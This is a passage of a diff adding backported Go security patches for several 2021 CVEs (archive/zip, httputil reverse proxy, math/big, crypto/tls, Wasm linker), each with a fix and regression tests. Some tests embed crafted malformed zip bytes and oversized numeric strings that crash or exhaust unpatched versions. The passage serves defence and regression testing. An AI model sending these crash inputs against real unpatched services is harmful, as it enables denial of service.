+ 	if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil {
+Index: go/src/archive/zip/reader_test.go
+===================================================================
+--- go.orig/src/archive/zip/reader_test.go
++++ go/src/archive/zip/reader_test.go
+@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) {
+ 		t.Errorf("Error reading the archive: %v", err)
+ 	}
+ }
++
++func TestCVE202133196(t *testing.T) {
++	// Archive that indicates it has 1 << 128 -1 files,
++	// this would previously cause a panic due to attempting
++	// to allocate a slice with 1 << 128 -1 elements.
++	data := []byte{
++		0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08,
++		0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02,
++		0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00,
++		0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20,
++		0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00,
++		0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00,
++		0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00,
++		0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00,
++		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++		0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c,
++		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d,
++		0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
++		0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00,
++		0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00,
++		0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50,
++		0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff,
++		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++		0xff, 0xff, 0xff, 0x00, 0x00,
++	}
++	_, err := NewReader(bytes.NewReader(data), int64(len(data)))
++	if err != ErrFormat {
++		t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++	}
++
++	// Also check that an archive containing a handful of empty
++	// files doesn't cause an issue
++	b := bytes.NewBuffer(nil)
++	w := NewWriter(b)
++	for i := 0; i < 5; i++ {
++		_, err := w.Create("")
++		if err != nil {
++			t.Fatalf("Writer.Create failed: %s", err)
++		}
++	}
++	if err := w.Close(); err != nil {
++		t.Fatalf("Writer.Close failed: %s", err)
++	}
++	r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len()))
++	if err != nil {
++		t.Fatalf("NewReader failed: %s", err)
++	}
++	if len(r.File) != 5 {
++		t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
++	}
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
new file mode 100644
index 0000000000..2052b1d3db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
@@ -0,0 +1,152 @@
+From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Fri, 21 May 2021 14:02:30 -0400
+Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove
+ hop-by-hop headers
+
+Previously, we'd fail to remove the Connection header from a request
+like this:
+
+    Connection:
+    Connection: x-header
+
+Updates #46313
+Fixes #46314
+Fixes CVE-2021-33197
+
+Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321929
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323091
+Run-TryBot: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33197
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/net/http/httputil/reverseproxy.go      | 22 ++++----
+ src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++-
+ 2 files changed, 70 insertions(+), 15 deletions(-)
+
+Index: go/src/net/http/httputil/reverseproxy.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy.go
++++ go/src/net/http/httputil/reverseproxy.go
+@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http
+ 	// important is "Connection" because we want a persistent
+ 	// connection, regardless of what the client sent to us.
+ 	for _, h := range hopHeaders {
+-		hv := outreq.Header.Get(h)
+-		if hv == "" {
+-			continue
+-		}
+-		if h == "Te" && hv == "trailers" {
+-			// Issue 21096: tell backend applications that
+-			// care about trailer support that we support
+-			// trailers. (We do, but we don't go out of
+-			// our way to advertise that unless the
+-			// incoming client request thought it was
+-			// worth mentioning)
+-			continue
+-		}
+ 		outreq.Header.Del(h)
+ 	}
+ 
++	// Issue 21096: tell backend applications that care about trailer support
++	// that we support trailers. (We do, but we don't go out of our way to
++	// advertise that unless the incoming client request thought it was worth
++	// mentioning.) Note that we look at req.Header, not outreq.Header, since
++	// the latter has passed through removeConnectionHeaders.
++	if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") {
++		outreq.Header.Set("Te", "trailers")
++	}
++
+ 	// After stripping all the hop-by-hop connection headers above, add back any
+ 	// necessary for protocol upgrades, such as for websockets.
+ 	if reqUpType != "" {
+Index: go/src/net/http/httputil/reverseproxy_test.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy_test.go
++++ go/src/net/http/httputil/reverseproxy_test.go
+@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) {
+ 
+ 	getReq, _ := http.NewRequest("GET", frontend.URL, nil)
+ 	getReq.Host = "some-name"
+-	getReq.Header.Set("Connection", "close")
+-	getReq.Header.Set("Te", "trailers")
++	getReq.Header.Set("Connection", "close, TE")
++	getReq.Header.Add("Te", "foo")
++	getReq.Header.Add("Te", "bar, trailers")
+ 	getReq.Header.Set("Proxy-Connection", "should be deleted")
+ 	getReq.Header.Set("Upgrade", "foo")
+ 	getReq.Close = true
+@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent
+ 	}
+ }
+ 
++func TestReverseProxyStripEmptyConnection(t *testing.T) {
++	// See Issue 46313.
++	const backendResponse = "I am the backend"
++
++	// someConnHeader is some arbitrary header to be declared as a hop-by-hop header
++	// in the Request's Connection header.
++	const someConnHeader = "X-Some-Conn-Header"
++
++	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++		if c := r.Header.Values("Connection"); len(c) != 0 {
++			t.Errorf("handler got header %q = %v; want empty", "Connection", c)
++		}
++		if c := r.Header.Get(someConnHeader); c != "" {
++			t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++		}
++		w.Header().Add("Connection", "")
++		w.Header().Add("Connection", someConnHeader)
++		w.Header().Set(someConnHeader, "should be deleted")
++		io.WriteString(w, backendResponse)
++	}))
++	defer backend.Close()
++	backendURL, err := url.Parse(backend.URL)
++	if err != nil {
++		t.Fatal(err)
++	}
++	proxyHandler := NewSingleHostReverseProxy(backendURL)
++	frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++		proxyHandler.ServeHTTP(w, r)
++		if c := r.Header.Get(someConnHeader); c != "should be deleted" {
++			t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted")
++		}
++	}))
++	defer frontend.Close()
++
++	getReq, _ := http.NewRequest("GET", frontend.URL, nil)
++	getReq.Header.Add("Connection", "")
++	getReq.Header.Add("Connection", someConnHeader)
++	getReq.Header.Set(someConnHeader, "should be deleted")
++	res, err := frontend.Client().Do(getReq)
++	if err != nil {
++		t.Fatalf("Get: %v", err)
++	}
++	defer res.Body.Close()
++	bodyBytes, err := ioutil.ReadAll(res.Body)
++	if err != nil {
++		t.Fatalf("reading body: %v", err)
++	}
++	if got, want := string(bodyBytes), backendResponse; got != want {
++		t.Errorf("got body %q; want %q", got, want)
++	}
++	if c := res.Header.Get("Connection"); c != "" {
++		t.Errorf("handler got header %q = %q; want empty", "Connection", c)
++	}
++	if c := res.Header.Get(someConnHeader); c != "" {
++		t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++	}
++}
++
+ func TestXForwardedFor(t *testing.T) {
+ 	const prevForwardedFor = "client ip"
+ 	const backendResponse = "I am the backend"
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
new file mode 100644
index 0000000000..241c08dad7
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
@@ -0,0 +1,113 @@
+From c8866491ac424cdf39aedb325e6dec9e54418cfb Mon Sep 17 00:00:00 2001
+From: Robert Griesemer <gri@golang.org>
+Date: Sun, 2 May 2021 11:27:03 -0700
+Subject: [PATCH] math/big: check for excessive exponents in Rat.SetString
+
+CVE-2021-33198
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/df9ce19db6df32d94eae8760927bdfbc595433c3]
+CVE: CVE-2021-33198
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Found by OSS-Fuzz https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33284
+
+Thanks to Emmanuel Odeke for reporting this issue.
+
+Updates #45910
+Fixes #46305
+Fixes CVE-2021-33198
+
+Change-Id: I61e7b04dbd80343420b57eede439e361c0f7b79c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/316149
+Trust: Robert Griesemer <gri@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Robert Griesemer <gri@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+(cherry picked from commit 6c591f79b0b5327549bd4e94970f7a279efb4ab0)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321831
+Run-TryBot: Katie Hockman <katie@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+---
+ src/math/big/ratconv.go      | 15 ++++++++-------
+ src/math/big/ratconv_test.go | 25 +++++++++++++++++++++++++
+ 2 files changed, 33 insertions(+), 7 deletions(-)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index e8cbdbe..90053a9 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -51,7 +51,8 @@ func (z *Rat) Scan(s fmt.ScanState, ch rune) error {
+ // An optional base-10 ``e'' or base-2 ``p'' (or their upper-case variants)
+ // exponent may be provided as well, except for hexadecimal floats which
+ // only accept an (optional) ``p'' exponent (because an ``e'' or ``E'' cannot
+-// be distinguished from a mantissa digit).
++// be distinguished from a mantissa digit). If the exponent's absolute value
++// is too large, the operation may fail.
+ // The entire string, not just a prefix, must be valid for success. If the
+ // operation failed, the value of z is undefined but the returned value is nil.
+ func (z *Rat) SetString(s string) (*Rat, bool) {
+@@ -174,6 +175,9 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ 				return nil, false
+ 			}
+ 		}
++		if n > 1e6 {
++			return nil, false // avoid excessively large exponents
++		}
+ 		pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ 		if exp5 > 0 {
+ 			z.a.abs = z.a.abs.mul(z.a.abs, pow5)
+@@ -186,15 +190,12 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ 	}
+ 
+ 	// apply exp2 contributions
++	if exp2 < -1e7 || exp2 > 1e7 {
++		return nil, false // avoid excessively large exponents
++	}
+ 	if exp2 > 0 {
+-		if int64(uint(exp2)) != exp2 {
+-			panic("exponent too large")
+-		}
+ 		z.a.abs = z.a.abs.shl(z.a.abs, uint(exp2))
+ 	} else if exp2 < 0 {
+-		if int64(uint(-exp2)) != -exp2 {
+-			panic("exponent too large")
+-		}
+ 		z.b.abs = z.b.abs.shl(z.b.abs, uint(-exp2))
+ 	}
+ 
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index b820df4..e55e655 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -590,3 +590,28 @@ func TestIssue31184(t *testing.T) {
+ 		}
+ 	}
+ }
++
++func TestIssue45910(t *testing.T) {
++	var x Rat
++	for _, test := range []struct {
++		input string
++		want  bool
++	}{
++		{"1e-1000001", false},
++		{"1e-1000000", true},
++		{"1e+1000000", true},
++		{"1e+1000001", false},
++
++		{"0p1000000000000", true},
++		{"1p-10000001", false},
++		{"1p-10000000", true},
++		{"1p+10000000", true},
++		{"1p+10000001", false},
++		{"1.770p02041010010011001001", false}, // test case from issue
++	} {
++		_, got := x.SetString(test.input)
++		if got != test.want {
++			t.Errorf("SetString(%s) got ok = %v; want %v", test.input, got, test.want)
++		}
++	}
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
new file mode 100644
index 0000000000..8fb346d622
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
@@ -0,0 +1,51 @@
+From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 9 Jun 2021 11:31:27 -0700
+Subject: [PATCH] crypto/tls: test key type when casting
+
+When casting the certificate public key in generateClientKeyExchange,
+check the type is appropriate. This prevents a panic when a server
+agrees to a RSA based key exchange, but then sends an ECDSA (or
+other) certificate.
+
+Fixes #47143
+Fixes CVE-2021-34558
+
+Thanks to Imre Rad for reporting this issue.
+
+Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-by: Katie Hockman <katiehockman@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport 
+https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
+CVE: CVE-2021-34558
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/crypto/tls/key_agreement.go | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: go/src/crypto/tls/key_agreement.go
+===================================================================
+--- go.orig/src/crypto/tls/key_agreement.go
++++ go/src/crypto/tls/key_agreement.go
+@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
+ 		return nil, nil, err
+ 	}
+ 
+-	encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
++	rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
++	if !ok {
++		return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
++	}
++	encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
+ 	if err != nil {
+ 		return nil, nil, err
+ 	}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
new file mode 100644
index 0000000000..9c00d4ebb2
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
@@ -0,0 +1,101 @@
+From b7a85e0003cedb1b48a1fd3ae5b746ec6330102e Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 7 Jul 2021 16:34:34 -0700
+Subject: [PATCH] net/http/httputil: close incoming ReverseProxy request body
+
+Reading from an incoming request body after the request handler aborts
+with a panic can cause a panic, becuse http.Server does not (contrary
+to its documentation) close the request body in this case.
+
+Always close the incoming request body in ReverseProxy.ServeHTTP to
+ensure that any in-flight outgoing requests using the body do not
+read from it.
+
+Updates #46866
+Fixes CVE-2021-36221
+
+Change-Id: I310df269200ad8732c5d9f1a2b00de68725831df
+Reviewed-on: https://go-review.googlesource.com/c/go/+/333191
+Trust: Damien Neil <dneil@google.com>
+Reviewed-by: Brad Fitzpatrick <bradfitz@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/b7a85e0003cedb1b48a1fd3ae5b746ec6330102e 
+CVE: CVE-2021-36221
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/net/http/httputil/reverseproxy.go      |  9 +++++
+ src/net/http/httputil/reverseproxy_test.go | 39 ++++++++++++++++++++++
+ 2 files changed, 48 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 5d39955d62d15..8b63368386f43 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -235,6 +235,15 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ 	if req.ContentLength == 0 {
+ 		outreq.Body = nil // Issue 16036: nil Body for http.Transport retries
+ 	}
++	if outreq.Body != nil {
++		// Reading from the request body after returning from a handler is not
++		// allowed, and the RoundTrip goroutine that reads the Body can outlive
++		// this handler. This can lead to a crash if the handler panics (see
++		// Issue 46866). Although calling Close doesn't guarantee there isn't
++		// any Read in flight after the handle returns, in practice it's safe to
++		// read after closing it.
++		defer outreq.Body.Close()
++	}
+ 	if outreq.Header == nil {
+ 		outreq.Header = make(http.Header) // Issue 33142: historical behavior was to always allocate
+ 	}
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 1898ed8b8afde..4b6ad77a29466 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1122,6 +1122,45 @@ func TestReverseProxy_PanicBodyError(t *testing.T) {
+ 	rproxy.ServeHTTP(httptest.NewRecorder(), req)
+ }
+ 
++// Issue #46866: panic without closing incoming request body causes a panic
++func TestReverseProxy_PanicClosesIncomingBody(t *testing.T) {
++	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++		out := "this call was relayed by the reverse proxy"
++		// Coerce a wrong content length to induce io.ErrUnexpectedEOF
++		w.Header().Set("Content-Length", fmt.Sprintf("%d", len(out)*2))
++		fmt.Fprintln(w, out)
++	}))
++	defer backend.Close()
++	backendURL, err := url.Parse(backend.URL)
++	if err != nil {
++		t.Fatal(err)
++	}
++	proxyHandler := NewSingleHostReverseProxy(backendURL)
++	proxyHandler.ErrorLog = log.New(io.Discard, "", 0) // quiet for tests
++	frontend := httptest.NewServer(proxyHandler)
++	defer frontend.Close()
++	frontendClient := frontend.Client()
++
++	var wg sync.WaitGroup
++	for i := 0; i < 2; i++ {
++		wg.Add(1)
++		go func() {
++			defer wg.Done()
++			for j := 0; j < 10; j++ {
++				const reqLen = 6 * 1024 * 1024
++				req, _ := http.NewRequest("POST", frontend.URL, &io.LimitedReader{R: neverEnding('x'), N: reqLen})
++				req.ContentLength = reqLen
++				resp, _ := frontendClient.Transport.RoundTrip(req)
++				if resp != nil {
++					io.Copy(io.Discard, resp.Body)
++					resp.Body.Close()
++				}
++			}
++		}()
++	}
++	wg.Wait()
++}
++
+ func TestSelectFlushInterval(t *testing.T) {
+ 	tests := []struct {
+ 		name string
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
new file mode 100644
index 0000000000..24ceabf808
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
@@ -0,0 +1,97 @@
+From 4548fcc8dfd933c237f29bba6f90040a85922564 Mon Sep 17 00:00:00 2001
+From: Michael Knyszek <mknyszek@google.com>
+Date: Thu, 2 Sep 2021 16:51:59 -0400
+Subject: [PATCH] [release-branch.go1.16] misc/wasm, cmd/link: do not let
+ command line args overwrite global data
+
+On Wasm, wasm_exec.js puts command line arguments at the beginning
+of the linear memory (following the "zero page"). Currently there
+is no limit for this, and a very long command line can overwrite
+the program's data section. Prevent this by limiting the command
+line to 4096 bytes, and in the linker ensuring the data section
+starts at a high enough address (8192).
+
+(Arguably our address assignment on Wasm is a bit confusing. This
+is the minimum fix I can come up with.)
+
+Thanks to Ben Lubar for reporting this issue.
+
+Change by Cherry Mui <cherryyz@google.com>.
+
+For #48797
+Fixes #48799
+Fixes CVE-2021-38297
+
+Change-Id: I0f50fbb2a5b6d0d047e3c134a88988d9133e4ab3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1205933
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/354591
+Trust: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+
+CVE: CVE-2021-38297
+
+Upstream-Status: Backport:
+https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564
+
+Inline of ctxt.isWAsm followin this implemetation:
+https://github.com/golang/go/blob/4548fcc8dfd933c237f29bba6f90040a85922564/src/cmd/link/internal/ld/target.go#L127
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ misc/wasm/wasm_exec.js           |  7 +++++++
+ src/cmd/link/internal/ld/data.go | 11 ++++++++++-
+ 2 files changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/misc/wasm/wasm_exec.js b/misc/wasm/wasm_exec.js
+index 82041e6bb901..a0a264278b1b 100644
+--- a/misc/wasm/wasm_exec.js
++++ b/misc/wasm/wasm_exec.js
+@@ -564,6 +564,13 @@
+ 				offset += 8;
+ 			});
+ 
++			// The linker guarantees global data starts from at least wasmMinDataAddr.
++			// Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
++			const wasmMinDataAddr = 4096 + 4096;
++			if (offset >= wasmMinDataAddr) {
++				throw new Error("command line too long");
++			}
++
+ 			this._inst.exports.run(argc, argv);
+ 			if (this.exited) {
+ 				this._resolveExitPromise();
+diff --git a/src/cmd/link/internal/ld/data.go b/src/cmd/link/internal/ld/data.go
+index 52035e96301c..54a1d188cdb9 100644
+--- a/src/cmd/link/internal/ld/data.go
++++ b/src/cmd/link/internal/ld/data.go
+@@ -2330,6 +2330,11 @@ func assignAddress(ctxt *Link, sect *sym.Section, n int, s loader.Sym, va uint64
+ 	return sect, n, va
+ }
+ 
++// On Wasm, we reserve 4096 bytes for zero page, then 4096 bytes for wasm_exec.js
++// to store command line args. Data sections starts from at least address 8192.
++// Keep in sync with wasm_exec.js.
++const wasmMinDataAddr = 4096 + 4096
++
+ // address assigns virtual addresses to all segments and sections and
+ // returns all segments in file order.
+ func (ctxt *Link) address() []*sym.Segment {
+@@ -2339,10 +2344,14 @@ func (ctxt *Link) address() []*sym.Segment {
+ 	order = append(order, &Segtext)
+ 	Segtext.Rwx = 05
+ 	Segtext.Vaddr = va
+-	for _, s := range Segtext.Sections {
++	for i, s := range Segtext.Sections {
+ 		va = uint64(Rnd(int64(va), int64(s.Align)))
+ 		s.Vaddr = va
+ 		va += s.Length
++
++		if ctxt.Arch.Family == sys.Wasm && i == 0 && va < wasmMinDataAddr {
++			va = wasmMinDataAddr
++		}
+ 	}
+ 
+ 	Segtext.Length = va - uint64(*FlagTextAddr)
+ 
\ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
new file mode 100644
index 0000000000..88fca9cad9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
@@ -0,0 +1,79 @@
+From 6c480017ae600b2c90a264a922e041df04dfa785 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 18 Aug 2021 11:49:29 -0700
+Subject: [PATCH] [release-branch.go1.16] archive/zip: prevent preallocation
+ check from overflowing
+
+If the indicated directory size in the archive header is so large that
+subtracting it from the archive size overflows a uint64, the check that
+the indicated number of files in the archive can be effectively
+bypassed. Prevent this from happening by checking that the indicated
+directory size is less than the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #47985
+Updates #47801
+Fixes CVE-2021-39293
+
+Change-Id: Ifade26b98a40f3b37398ca86bd5252d12394dd24
+Reviewed-on: https://go-review.googlesource.com/c/go/+/343434
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+(cherry picked from commit bacbc33439b124ffd7392c91a5f5d96eca8c0c0b)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/345409
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+Trust: Cherry Mui <cherryyz@google.com>
+
+https://github.com/golang/go/commit/6c480017ae600b2c90a264a922e041df04dfa785
+CVE: CVE-2021-39293
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/archive/zip/reader.go      |  2 +-
+ src/archive/zip/reader_test.go | 18 ++++++++++++++++++
+ 2 files changed, 19 insertions(+), 1 deletion(-)
+
+diff --git a/src/archive/zip/reader.go b/src/archive/zip/reader.go
+index ddef2b7b5a517..801d1313b6c32 100644
+--- a/src/archive/zip/reader.go
++++ b/src/archive/zip/reader.go
+@@ -105,7 +105,7 @@ func (z *Reader) init(r io.ReaderAt, size int64) error {
+ 	// indicate it contains up to 1 << 128 - 1 files. Since each file has a
+ 	// header which will be _at least_ 30 bytes we can safely preallocate
+ 	// if (data size / 30) >= end.directoryRecords.
+-	if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++	if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
+ 		z.File = make([]*File, 0, end.directoryRecords)
+ 	}
+ 	z.Comment = end.comment
+diff --git a/src/archive/zip/reader_test.go b/src/archive/zip/reader_test.go
+index 471be27bb1004..99f13345d8d06 100644
+--- a/src/archive/zip/reader_test.go
++++ b/src/archive/zip/reader_test.go
+@@ -1225,3 +1225,21 @@ func TestCVE202133196(t *testing.T) {
+ 		t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
+ 	}
+ }
++
++func TestCVE202139293(t *testing.T) {
++	// directory size is so large, that the check in Reader.init
++	// overflows when subtracting from the archive size, causing
++	// the pre-allocation check to be bypassed.
++	data := []byte{
++		0x50, 0x4b, 0x06, 0x06, 0x05, 0x06, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++		0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++		0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++		0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++		0x00, 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
++		0xff, 0x50, 0xfe, 0x00, 0xff, 0x00, 0x3a, 0x00, 0x00, 0x00, 0xff,
++	}
++	_, err := NewReader(bytes.NewReader(data), int64(len(data)))
++	if err != ErrFormat {
++		t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++	}
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
new file mode 100644
index 0000000000..526796dbcb
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
@@ -0,0 +1,86 @@
+From d19c5bdb24e093a2d5097b7623284eb02726cede Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 14 Oct 2021 13:02:01 -0700
+Subject: [PATCH] [release-branch.go1.16] debug/macho: fail on invalid dynamic
+ symbol table command
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fail out when loading a file that contains a dynamic symbol table
+command that indicates a larger number of symbols than exist in the
